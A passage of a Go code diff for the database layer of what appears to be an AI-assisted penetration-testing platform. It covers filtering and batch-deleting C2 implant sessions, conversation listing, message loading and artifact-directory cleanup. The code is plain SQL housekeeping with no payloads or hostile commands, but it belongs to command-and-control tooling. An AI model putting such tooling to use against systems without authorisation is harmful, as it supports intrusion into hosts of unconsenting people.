if len(id) < 2 || len(id) > 80 {
|
||||||
@@ -473,6 +476,7 @@ type ListC2SessionsFilter struct {
|
|||||||
Status string // active|sleeping|dead|killed;空表示全部
|
Status string // active|sleeping|dead|killed;空表示全部
|
||||||
OS string
|
OS string
|
||||||
Search string // 模糊匹配 hostname/username/internal_ip
|
Search string // 模糊匹配 hostname/username/internal_ip
|
||||||
|
Suspicious bool // 疑似误报:离线且 hostname 为 tcp_* / 用户名为 unknown / PID 为 0
|
||||||
Limit int // 0 表示无限制
|
Limit int // 0 表示无限制
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -497,6 +501,11 @@ func (db *DB) ListC2Sessions(filter ListC2SessionsFilter) ([]*C2Session, error)
|
|||||||
kw := "%" + filter.Search + "%"
|
kw := "%" + filter.Search + "%"
|
||||||
args = append(args, kw, kw, kw)
|
args = append(args, kw, kw, kw)
|
||||||
}
|
}
|
||||||
|
if filter.Suspicious {
|
||||||
|
conditions = append(conditions, `status = 'dead' AND (
|
||||||
|
hostname LIKE 'tcp_%' OR LOWER(COALESCE(username,'')) = 'unknown' OR COALESCE(pid, 0) = 0
|
||||||
|
)`)
|
||||||
|
}
|
||||||
query := `
|
query := `
|
||||||
SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''),
|
SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''),
|
||||||
COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''),
|
COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''),
|
||||||
@@ -554,6 +563,44 @@ func (db *DB) DeleteC2Session(id string) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// DeleteC2SessionsByIDs 按主键批量删除会话
|
||||||
|
func (db *DB) DeleteC2SessionsByIDs(ids []string) (int64, error) {
|
||||||
|
if len(ids) == 0 {
|
||||||
|
return 0, nil
|
||||||
|
}
|
||||||
|
const maxBatch = 500
|
||||||
|
if len(ids) > maxBatch {
|
||||||
|
ids = ids[:maxBatch]
|
||||||
|
}
|
||||||
|
clean := make([]string, 0, len(ids))
|
||||||
|
seen := make(map[string]struct{}, len(ids))
|
||||||
|
for _, id := range ids {
|
||||||
|
id = strings.TrimSpace(id)
|
||||||
|
if !validC2TextIDForDelete(id) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if _, ok := seen[id]; ok {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
seen[id] = struct{}{}
|
||||||
|
clean = append(clean, id)
|
||||||
|
}
|
||||||
|
if len(clean) == 0 {
|
||||||
|
return 0, ErrNoValidC2SessionIDs
|
||||||
|
}
|
||||||
|
placeholders := strings.Repeat("?,", len(clean)-1) + "?"
|
||||||
|
args := make([]interface{}, len(clean))
|
||||||
|
for i := range clean {
|
||||||
|
args[i] = clean[i]
|
||||||
|
}
|
||||||
|
query := `DELETE FROM c2_sessions WHERE id IN (` + placeholders + `)`
|
||||||
|
res, err := db.Exec(query, args...)
|
||||||
|
if err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
return res.RowsAffected()
|
||||||
|
}
|
||||||
|
|
||||||
// ----------------------------------------------------------------------------
|
// ----------------------------------------------------------------------------
|
||||||
// CRUD:C2 任务
|
// CRUD:C2 任务
|
||||||
// ----------------------------------------------------------------------------
|
// ----------------------------------------------------------------------------
|
||||||
@@ -840,7 +887,7 @@ func (db *DB) PopQueuedC2Tasks(sessionID string, limit int) ([]*C2Task, error) {
|
|||||||
created_at
|
created_at
|
||||||
FROM c2_tasks
|
FROM c2_tasks
|
||||||
WHERE session_id = ? AND (status = 'queued' AND (approval_status = '' OR approval_status = 'approved'))
|
WHERE session_id = ? AND (status = 'queued' AND (approval_status = '' OR approval_status = 'approved'))
|
||||||
ORDER BY created_at ASC
|
ORDER BY created_at ASC, rowid ASC
|
||||||
LIMIT ?
|
LIMIT ?
|
||||||
`
|
`
|
||||||
rows, err := tx.Query(query, sessionID, limit)
|
rows, err := tx.Query(query, sessionID, limit)
|
||||||
|
|||||||
@@ -352,8 +352,8 @@ func (db *DB) GetConversationLite(id string) (*Conversation, error) {
|
|||||||
|
|
||||||
conv.Pinned = pinned != 0
|
conv.Pinned = pinned != 0
|
||||||
|
|
||||||
// 加载消息(不加载 process_details)
|
// 加载消息(不加载 process_details / reasoning_content,减少历史会话切换 payload)
|
||||||
messages, err := db.GetMessages(id)
|
messages, err := db.GetMessagesLite(id)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("加载消息失败: %w", err)
|
return nil, fmt.Errorf("加载消息失败: %w", err)
|
||||||
}
|
}
|
||||||
@@ -361,26 +361,61 @@ func (db *DB) GetConversationLite(id string) (*Conversation, error) {
|
|||||||
return &conv, nil
|
return &conv, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// CountConversations 统计对话数量。
|
||||||
|
func (db *DB) CountConversations(search string) (int, error) {
|
||||||
|
var count int
|
||||||
|
var err error
|
||||||
|
if search != "" {
|
||||||
|
searchPattern := "%" + search + "%"
|
||||||
|
err = db.QueryRow(
|
||||||
|
`SELECT COUNT(*) FROM conversations c
|
||||||
|
WHERE c.title LIKE ?
|
||||||
|
OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?)`,
|
||||||
|
searchPattern, searchPattern,
|
||||||
|
).Scan(&count)
|
||||||
|
} else {
|
||||||
|
err = db.QueryRow(`SELECT COUNT(*) FROM conversations`).Scan(&count)
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("统计对话失败: %w", err)
|
||||||
|
}
|
||||||
|
return count, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func conversationOrderClause(sortBy, tableAlias string) string {
|
||||||
|
col := "updated_at"
|
||||||
|
if strings.TrimSpace(strings.ToLower(sortBy)) == "created_at" {
|
||||||
|
col = "created_at"
|
||||||
|
}
|
||||||
|
prefix := tableAlias
|
||||||
|
if prefix != "" {
|
||||||
|
prefix += "."
|
||||||
|
}
|
||||||
|
return "ORDER BY " + prefix + col + " DESC"
|
||||||
|
}
|
||||||
|
|
||||||
// ListConversations 列出所有对话
|
// ListConversations 列出所有对话
|
||||||
func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversation, error) {
|
func (db *DB) ListConversations(limit, offset int, search, sortBy string) ([]*Conversation, error) {
|
||||||
var rows *sql.Rows
|
var rows *sql.Rows
|
||||||
var err error
|
var err error
|
||||||
|
|
||||||
if search != "" {
|
if search != "" {
|
||||||
// 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积
|
// 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积
|
||||||
searchPattern := "%" + search + "%"
|
searchPattern := "%" + search + "%"
|
||||||
|
orderClause := conversationOrderClause(sortBy, "c")
|
||||||
rows, err = db.Query(
|
rows, err = db.Query(
|
||||||
`SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id
|
`SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id
|
||||||
FROM conversations c
|
FROM conversations c
|
||||||
WHERE c.title LIKE ?
|
WHERE c.title LIKE ?
|
||||||
OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?)
|
OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?)
|
||||||
ORDER BY c.updated_at DESC
|
`+orderClause+`
|
||||||
LIMIT ? OFFSET ?`,
|
LIMIT ? OFFSET ?`,
|
||||||
searchPattern, searchPattern, limit, offset,
|
searchPattern, searchPattern, limit, offset,
|
||||||
)
|
)
|
||||||
} else {
|
} else {
|
||||||
|
orderClause := conversationOrderClause(sortBy, "")
|
||||||
rows, err = db.Query(
|
rows, err = db.Query(
|
||||||
"SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id FROM conversations ORDER BY updated_at DESC LIMIT ? OFFSET ?",
|
"SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id FROM conversations "+orderClause+" LIMIT ? OFFSET ?",
|
||||||
limit, offset,
|
limit, offset,
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
@@ -430,6 +465,74 @@ func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversati
|
|||||||
return conversations, nil
|
return conversations, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
const ungroupedConversationsSQL = `
|
||||||
|
FROM conversations c
|
||||||
|
WHERE NOT EXISTS (
|
||||||
|
SELECT 1 FROM conversation_group_mappings cgm WHERE cgm.conversation_id = c.id
|
||||||
|
)`
|
||||||
|
|
||||||
|
// CountUngroupedConversations 统计不在任何分组中的对话数量。
|
||||||
|
func (db *DB) CountUngroupedConversations() (int, error) {
|
||||||
|
var count int
|
||||||
|
if err := db.QueryRow(`SELECT COUNT(*) ` + ungroupedConversationsSQL).Scan(&count); err != nil {
|
||||||
|
return 0, fmt.Errorf("统计未分组对话失败: %w", err)
|
||||||
|
}
|
||||||
|
return count, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListUngroupedConversations 列出不在任何分组中的对话(最近对话侧栏)。
|
||||||
|
func (db *DB) ListUngroupedConversations(limit, offset int, sortBy string) ([]*Conversation, error) {
|
||||||
|
orderClause := conversationOrderClause(sortBy, "c")
|
||||||
|
rows, err := db.Query(
|
||||||
|
`SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id `+
|
||||||
|
ungroupedConversationsSQL+`
|
||||||
|
`+orderClause+`
|
||||||
|
LIMIT ? OFFSET ?`,
|
||||||
|
limit, offset,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("查询未分组对话失败: %w", err)
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
var conversations []*Conversation
|
||||||
|
for rows.Next() {
|
||||||
|
var conv Conversation
|
||||||
|
var createdAt, updatedAt string
|
||||||
|
var pinned int
|
||||||
|
var projectID sql.NullString
|
||||||
|
|
||||||
|
if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &projectID); err != nil {
|
||||||
|
return nil, fmt.Errorf("扫描对话失败: %w", err)
|
||||||
|
}
|
||||||
|
if projectID.Valid {
|
||||||
|
conv.ProjectID = strings.TrimSpace(projectID.String)
|
||||||
|
}
|
||||||
|
|
||||||
|
var err1, err2 error
|
||||||
|
conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
|
||||||
|
if err1 != nil {
|
||||||
|
conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt)
|
||||||
|
}
|
||||||
|
if err1 != nil {
|
||||||
|
conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
|
||||||
|
}
|
||||||
|
|
||||||
|
conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt)
|
||||||
|
if err2 != nil {
|
||||||
|
conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt)
|
||||||
|
}
|
||||||
|
if err2 != nil {
|
||||||
|
conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt)
|
||||||
|
}
|
||||||
|
|
||||||
|
conv.Pinned = pinned != 0
|
||||||
|
conversations = append(conversations, &conv)
|
||||||
|
}
|
||||||
|
|
||||||
|
return conversations, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
// UpdateConversationTitle 更新对话标题
|
// UpdateConversationTitle 更新对话标题
|
||||||
func (db *DB) UpdateConversationTitle(id, title string) error {
|
func (db *DB) UpdateConversationTitle(id, title string) error {
|
||||||
// 注意:不更新 updated_at,因为重命名操作不应该改变对话的更新时间
|
// 注意:不更新 updated_at,因为重命名操作不应该改变对话的更新时间
|
||||||
@@ -455,39 +558,107 @@ func (db *DB) UpdateConversationTime(id string) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// DeleteConversation 删除对话及其所有相关数据
|
// DeleteConversation 删除对话及其会话相关数据。
|
||||||
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
|
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
|
||||||
// - messages(消息)
|
// - messages(消息)
|
||||||
// - process_details(过程详情)
|
// - process_details(过程详情)
|
||||||
// - attack_chain_nodes(攻击链节点)
|
// - attack_chain_nodes(攻击链节点)
|
||||||
// - attack_chain_edges(攻击链边)
|
// - attack_chain_edges(攻击链边)
|
||||||
// - vulnerabilities(漏洞)
|
|
||||||
// - conversation_group_mappings(分组映射)
|
// - conversation_group_mappings(分组映射)
|
||||||
// 注意:knowledge_retrieval_logs 使用 ON DELETE SET NULL,记录会保留但 conversation_id 会被设为 NULL
|
// 漏洞记录会保留:vulnerabilities.conversation_id 使用 ON DELETE SET NULL,仅解除与会话的关联。
|
||||||
|
// 注意:knowledge_retrieval_logs 在删除前会被显式清理。
|
||||||
func (db *DB) DeleteConversation(id string) error {
|
func (db *DB) DeleteConversation(id string) error {
|
||||||
|
// 删除对话前补全漏洞来源标签,便于在漏洞库中追溯已删除会话的发现。
|
||||||
|
_, err := db.Exec(`
|
||||||
|
UPDATE vulnerabilities
|
||||||
|
SET conversation_tag = COALESCE(NULLIF(TRIM(conversation_tag), ''), (SELECT title FROM conversations WHERE id = ?))
|
||||||
|
WHERE conversation_id = ?
|
||||||
|
`, id, id)
|
||||||
|
if err != nil {
|
||||||
|
db.logger.Warn("更新漏洞来源标签失败", zap.String("conversationId", id), zap.Error(err))
|
||||||
|
}
|
||||||
|
|
||||||
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
|
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
|
||||||
_, err := db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
|
_, err = db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
|
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
|
||||||
// 不返回错误,继续删除对话
|
// 不返回错误,继续删除对话
|
||||||
}
|
}
|
||||||
|
|
||||||
|
projectID, _ := db.GetConversationProjectID(id)
|
||||||
|
|
||||||
// 删除对话(外键CASCADE会自动删除其他相关数据)
|
// 删除对话(外键CASCADE会自动删除其他相关数据)
|
||||||
_, err = db.Exec("DELETE FROM conversations WHERE id = ?", id)
|
_, err = db.Exec("DELETE FROM conversations WHERE id = ?", id)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return fmt.Errorf("删除对话失败: %w", err)
|
return fmt.Errorf("删除对话失败: %w", err)
|
||||||
}
|
}
|
||||||
// Best-effort cleanup for conversation-scoped filesystem artifacts
|
db.removeConversationScopedDirs(id, projectID)
|
||||||
// (e.g., summarization transcript, reduction/checkpoint files under conversation_artifacts/<id>).
|
|
||||||
if base := strings.TrimSpace(db.conversationArtifactsDir); base != "" {
|
db.logger.Info("对话已删除(漏洞记录已保留)", zap.String("conversationId", id))
|
||||||
artDir := filepath.Join(base, id)
|
return nil
|
||||||
if rmErr := os.RemoveAll(artDir); rmErr != nil {
|
}
|
||||||
db.logger.Warn("删除会话 artifacts 目录失败", zap.String("conversationId", id), zap.String("dir", artDir), zap.Error(rmErr))
|
|
||||||
|
func sanitizeConversationPathSegment(s string) string {
|
||||||
|
s = strings.TrimSpace(s)
|
||||||
|
if s == "" {
|
||||||
|
return "default"
|
||||||
|
}
|
||||||
|
s = strings.ReplaceAll(s, string(filepath.Separator), "-")
|
||||||
|
s = strings.ReplaceAll(s, "/", "-")
|
||||||
|
s = strings.ReplaceAll(s, "\\", "-")
|
||||||
|
s = strings.ReplaceAll(s, "..", "__")
|
||||||
|
if len(s) > 180 {
|
||||||
|
s = s[:180]
|
||||||
|
}
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
|
||||||
|
func (db *DB) removeConversationScopedDir(base, conversationID, label string) {
|
||||||
|
base = strings.TrimSpace(base)
|
||||||
|
if base == "" {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
dir := filepath.Join(base, sanitizeConversationPathSegment(conversationID))
|
||||||
|
if rmErr := os.RemoveAll(dir); rmErr != nil {
|
||||||
|
if db.logger != nil {
|
||||||
|
db.logger.Warn("删除会话目录失败",
|
||||||
|
zap.String("conversationId", conversationID),
|
||||||
|
zap.String("kind", label),
|
||||||
|
zap.String("dir", dir),
|
||||||
|
zap.Error(rmErr))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
}
|
||||||
|
|
||||||
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id))
|
func (db *DB) einoReductionBaseDir() string {
|
||||||
return nil
|
if db == nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
if base := strings.TrimSpace(db.einoReductionRootDir); base != "" {
|
||||||
|
return base
|
||||||
|
}
|
||||||
|
return filepath.Join("tmp", "reduction")
|
||||||
|
}
|
||||||
|
|
||||||
|
func (db *DB) removeConversationScopedDirs(conversationID, projectID string) {
|
||||||
|
// summarization transcript, etc.
|
||||||
|
db.removeConversationScopedDir(db.conversationArtifactsDir, conversationID, "conversation_artifacts")
|
||||||
|
// Eino plantask JSON boards (skills_dir/.eino/plantask/<id>/).
|
||||||
|
db.removeConversationScopedDir(db.einoPlantaskBaseDir, conversationID, "plantask")
|
||||||
|
// Eino ADK runner checkpoints (checkpoint_dir/<id>/).
|
||||||
|
db.removeConversationScopedDir(db.einoCheckpointBaseDir, conversationID, "eino_checkpoint")
|
||||||
|
// Eino reduction persisted tool outputs (tmp/reduction/conversations/<id>/).
|
||||||
|
// Project-bound sessions share projects/<id>/ — skip on single conversation delete.
|
||||||
|
if strings.TrimSpace(projectID) == "" {
|
||||||
|
reductionBase := filepath.Join(db.einoReductionBaseDir(), "conversations")
|
||||||
|
db.removeConversationScopedDir(reductionBase, conversationID, "reduction")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (db *DB) removeProjectScopedDirs(projectID string) {
|
||||||
|
// Eino reduction persisted tool outputs (tmp/reduction/projects/<id>/).
|
||||||
|
reductionBase := filepath.Join(db.einoReductionBaseDir(), "projects")
|
||||||
|
db.removeConversationScopedDir(reductionBase, projectID, "reduction")
|
||||||
}
|
}
|
||||||
|
|
||||||
// SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。
|
// SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。
|
||||||
@@ -604,7 +775,7 @@ func (db *DB) UpdateAssistantMessageFinalize(messageID, content string, mcpExecu
|
|||||||
// GetMessages 获取对话的所有消息
|
// GetMessages 获取对话的所有消息
|
||||||
func (db *DB) GetMessages(conversationID string) ([]Message, error) {
|
func (db *DB) GetMessages(conversationID string) ([]Message, error) {
|
||||||
rows, err := db.Query(
|
rows, err := db.Query(
|
||||||
"SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC",
|
"SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC",
|
||||||
conversationID,
|
conversationID,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -664,6 +835,62 @@ func (db *DB) GetMessages(conversationID string) ([]Message, error) {
|
|||||||
return messages, nil
|
return messages, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// GetMessagesLite 获取对话消息(不含 reasoning_content),用于历史会话快速切换。
|
||||||
|
func (db *DB) GetMessagesLite(conversationID string) ([]Message, error) {
|
||||||
|
rows, err := db.Query(
|
||||||
|
"SELECT id, conversation_id, role, content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC",
|
||||||
|
conversationID,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("查询消息失败: %w", err)
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
var messages []Message
|
||||||
|
for rows.Next() {
|
||||||
|
var msg Message
|
||||||
|
var mcpIDsJSON sql.NullString
|
||||||
|
var createdAt string
|
||||||
|
var updatedAt sql.NullString
|
||||||
|
|
||||||
|
if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &mcpIDsJSON, &createdAt, &updatedAt); err != nil {
|
||||||
|
return nil, fmt.Errorf("扫描消息失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var err error
|
||||||
|
msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
|
||||||
|
if err != nil {
|
||||||
|
msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05", createdAt)
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
|
||||||
|
}
|
||||||
|
|
||||||
|
if updatedAt.Valid && strings.TrimSpace(updatedAt.String) != "" {
|
||||||
|
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt.String)
|
||||||
|
if err != nil {
|
||||||
|
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05", updatedAt.String)
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
msg.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt.String)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if msg.UpdatedAt.IsZero() {
|
||||||
|
msg.UpdatedAt = msg.CreatedAt
|
||||||
|
}
|
||||||
|
|
||||||
|
if mcpIDsJSON.Valid && mcpIDsJSON.String != "" {
|
||||||
|
if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil {
|
||||||
|
db.logger.Warn("解析MCP执行ID失败", zap.Error(err))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
messages = append(messages, msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
return messages, nil
|
||||||
|
}
|
||||||
|
|
||||||
// turnSliceRange 根据任意一条消息 ID 定位「一轮对话」在 msgs 中的 [start, end) 下标区间(msgs 须已按时间升序,与 GetMessages 一致)。
|
// turnSliceRange 根据任意一条消息 ID 定位「一轮对话」在 msgs 中的 [start, end) 下标区间(msgs 须已按时间升序,与 GetMessages 一致)。
|
||||||
// 一轮 = 从某条 user 消息起,至下一条 user 之前(含中间所有 assistant)。
|
// 一轮 = 从某条 user 消息起,至下一条 user 之前(含中间所有 assistant)。
|
||||||
func turnSliceRange(msgs []Message, anchorID string) (start, end int, err error) {
|
func turnSliceRange(msgs []Message, anchorID string) (start, end int, err error) {
|
||||||
@@ -799,7 +1026,7 @@ func (db *DB) AddProcessDetail(messageID, conversationID, eventType, message str
|
|||||||
// GetProcessDetails 获取消息的过程详情
|
// GetProcessDetails 获取消息的过程详情
|
||||||
func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) {
|
func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) {
|
||||||
rows, err := db.Query(
|
rows, err := db.Query(
|
||||||
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC",
|
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC, rowid ASC",
|
||||||
messageID,
|
messageID,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -832,10 +1059,111 @@ func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) {
|
|||||||
return details, nil
|
return details, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ProcessDetailsSummary 过程详情摘要(用于折叠态展示,避免全量加载)。
|
||||||
|
type ProcessDetailsSummary struct {
|
||||||
|
Total int `json:"total"`
|
||||||
|
IterationCount int `json:"iterationCount"`
|
||||||
|
MaxIteration int `json:"maxIteration"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetProcessDetailsSummary 统计消息的过程详情数量与迭代轮次。
|
||||||
|
func (db *DB) GetProcessDetailsSummary(messageID string) (*ProcessDetailsSummary, error) {
|
||||||
|
var total int
|
||||||
|
if err := db.QueryRow(
|
||||||
|
"SELECT COUNT(*) FROM process_details WHERE message_id = ?",
|
||||||
|
messageID,
|
||||||
|
).Scan(&total); err != nil {
|
||||||
|
return nil, fmt.Errorf("统计过程详情失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
summary := &ProcessDetailsSummary{Total: total}
|
||||||
|
if total == 0 {
|
||||||
|
return summary, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
rows, err := db.Query(
|
||||||
|
"SELECT data FROM process_details WHERE message_id = ? AND event_type = 'iteration' ORDER BY created_at ASC, rowid ASC",
|
||||||
|
messageID,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("查询迭代详情失败: %w", err)
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
maxIter := 0
|
||||||
|
iterCount := 0
|
||||||
|
for rows.Next() {
|
||||||
|
var dataJSON string
|
||||||
|
if err := rows.Scan(&dataJSON); err != nil {
|
||||||
|
return nil, fmt.Errorf("扫描迭代详情失败: %w", err)
|
||||||
|
}
|
||||||
|
iterCount++
|
||||||
|
if dataJSON == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
var payload map[string]interface{}
|
||||||
|
if err := json.Unmarshal([]byte(dataJSON), &payload); err != nil {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if n, ok := payload["iteration"].(float64); ok && int(n) > maxIter {
|
||||||
|
maxIter = int(n)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
summary.IterationCount = iterCount
|
||||||
|
summary.MaxIteration = maxIter
|
||||||
|
return summary, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetProcessDetailsPage 分页获取消息的过程详情(按时间升序)。
|
||||||
|
func (db *DB) GetProcessDetailsPage(messageID string, limit, offset int) ([]ProcessDetail, int, error) {
|
||||||
|
var total int
|
||||||
|
if err := db.QueryRow(
|
||||||
|
"SELECT COUNT(*) FROM process_details WHERE message_id = ?",
|
||||||
|
messageID,
|
||||||
|
).Scan(&total); err != nil {
|
||||||
|
return nil, 0, fmt.Errorf("统计过程详情失败: %w", err)
|
||||||
|
}
|
||||||
|
if total == 0 || offset >= total {
|
||||||
|
return nil, total, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
rows, err := db.Query(
|
||||||
|
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC, rowid ASC LIMIT ? OFFSET ?",
|
||||||
|
messageID, limit, offset,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, 0, fmt.Errorf("查询过程详情失败: %w", err)
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
var details []ProcessDetail
|
||||||
|
for rows.Next() {
|
||||||
|
var detail ProcessDetail
|
||||||
|
var createdAt string
|
||||||
|
|
||||||
|
if err := rows.Scan(&detail.ID, &detail.MessageID, &detail.ConversationID, &detail.EventType, &detail.Message, &detail.Data, &createdAt); err != nil {
|
||||||
|
return nil, 0, fmt.Errorf("扫描过程详情失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var parseErr error
|
||||||
|
detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
|
||||||
|
if parseErr != nil {
|
||||||
|
detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05", createdAt)
|
||||||
|
}
|
||||||
|
if parseErr != nil {
|
||||||
|
detail.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
|
||||||
|
}
|
||||||
|
|
||||||
|
details = append(details, detail)
|
||||||
|
}
|
||||||
|
|
||||||
|
return details, total, nil
|
||||||
|
}
|
||||||
|
|
||||||
// GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组)
|
// GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组)
|
||||||
func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) {
|
func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) {
|
||||||
rows, err := db.Query(
|
rows, err := db.Query(
|
||||||
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE conversation_id = ? ORDER BY created_at ASC",
|
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC",
|
||||||
conversationID,
|
conversationID,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
|
|||||||
@@ -0,0 +1,94 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestDeleteConversationRemovesEinoScopedDirs(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
dbPath := filepath.Join(tmp, "conversations.db")
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
